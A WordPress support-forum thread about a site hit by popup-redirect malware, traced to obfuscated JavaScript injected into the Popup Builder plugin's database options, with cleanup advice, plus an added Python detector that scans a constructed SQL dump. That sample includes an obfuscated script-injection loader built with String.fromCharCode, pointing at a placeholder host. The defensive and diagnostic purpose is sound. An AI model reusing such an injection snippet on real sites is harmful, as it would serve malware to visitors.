Hi,
    So my WordPress website is compromised: when going to the main URL, a popup window shows up and it redirects users to ads and malign websites.

    Debugging my website homepage I found the following script called:

    Request URL: https://***/up/display.js
    :path: /up/display.js

    Which calls:
    Request URL: https://cdn.***.***/link-converter.min.js

    Which calls:
    Request URL: https://***.com/pu-placer.js?t=1514302a73

    I checked my files' timestamps and none of them were modified, which makes me believe that the malware is actually injected into the database.

    I disabled all plugins and the malware redirect seems to stop. Does that confirm that the malware resides in the DB alone, seeing that none of the hosted files were modified?

    This topic was modified 6 years, 2 months ago by jojojijijojo.
Viewing 4 replies - 1 through 4 (of 4 total)
  Smat Placid

    (@www_smatplacid_com)

    FIRST step should be: having a backup! If you don’t have any yet, try to install e.g. “UpDraft” in the free version and make a backup.

    Usually root-files will be compromised first.
    Check ‘wp-config.php’, ‘wp-settings.php’, ‘index.php’ (and so on) and look for suspicious @include commands.

    You can start with an IMO very good tool ‘Anti-Malware Security and Brute-Force Firewall’ <https://ww.wp.xz.cn/plugins/gotmls/>.
    It scans all files in your WordPress install.

    What helps is to delete the DIRs “wp-admin” and “wp-includes” and re-upload these DIRs from a zip – just to make sure these two folders are clean.

    Thread Starter jojojijijojo

    (@jojojijijojo)

    Thanks Smat,

    I found the culprit plugin, it was “Popup Builder – Responsive WordPress Pop up”
    When searching the database for “String.fromCharCode”, I found two results (sg_popup_scripts and sg_popup_options_preview) that included the malicious injected JS code, deleting it seems to solve this, but this could have been much much worse…

    I’m still going to re-upload critical folders like you mentioned just in case.

    Also try to upload the last stable db dump. Additional mods could have been made to the db. Better safe than sorry.

    All the best!
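An added example (not part of the thread or of any plugin) of the database search described above, done as a defender's check: it parses wp_options rows out of a constructed SQL dump, flags option values carrying injection indicators such as String.fromCharCode or an injected script tag, and decodes the character-code sequence so the loader URL can be reported. The dump rows, the option names and the decoded domain (example.invalid) are constructed placeholders, not data from the thread.

```python
import re

# Constructed sample: three wp_options rows, one carrying an obfuscated <script>
# inside a plugin option (named after the sg_popup_* options from the thread).
SAMPLE_DUMP = r"""
INSERT INTO `wp_options` VALUES (101,'blogname','My Site','yes');
INSERT INTO `wp_options` VALUES (102,'sg_popup_scripts','<script>var s=document.createElement(\'script\');s.src=String.fromCharCode(104,116,116,112,115,58,47,47,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,117,112,47,100,105,115,112,108,97,121,46,106,115);document.head.appendChild(s);</script>','yes');
INSERT INTO `wp_options` VALUES (103,'sg_popup_options_preview','a:1:{s:5:\"title\";s:5:\"hello\";}','yes');
"""

# One single-row INSERT; the value group tolerates backslash-escaped quotes.
ROW_RE = re.compile(
    r"INSERT INTO `wp_options` VALUES \(\d+,'([^']*)','((?:[^'\\]|\\.)*)','(?:yes|no)'\);"
)
INDICATORS = {
    "String.fromCharCode": re.compile(r"String\.fromCharCode\s*\("),
    "eval": re.compile(r"\beval\s*\("),
    "external script tag": re.compile(r"<script[^>]*\bsrc\s*=", re.I),
    "injected script tag": re.compile(r"<script\b", re.I),
}
CHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(([\d,\s]+)\)")


def parse_options(dump):
    """Yield (option_name, option_value) from single-row INSERT statements."""
    for m in ROW_RE.finditer(dump):
        name, value = m.group(1), m.group(2)
        # Undo the dump's backslash escapes (\' \" \\) so patterns see raw text.
        yield name, re.sub(r"\\(.)", r"\1", value)


def decode_charcodes(value):
    """Turn every String.fromCharCode(...) call into the string it builds."""
    return ["".join(chr(int(c)) for c in m.group(1).split(",") if c.strip())
            for m in CHARCODE_RE.finditer(value)]


def find_suspicious(dump):
    """Return one finding per option whose value shows an injection indicator."""
    findings = []
    for name, value in parse_options(dump):
        hits = [label for label, rx in INDICATORS.items() if rx.search(value)]
        if hits:
            findings.append({"option": name, "indicators": hits,
                             "decoded": decode_charcodes(value)})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_DUMP):
        print(f["option"], f["indicators"], f["decoded"])
```

On a real site, feed it a mysqldump of wp_options (or the whole database) and treat any decoded URL as an indicator to block and report, not as something to visit.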

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Trust nothing once your site has been compromised.

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.


The topic ‘WordPress compromised – popup malware attack’ is closed to new replies.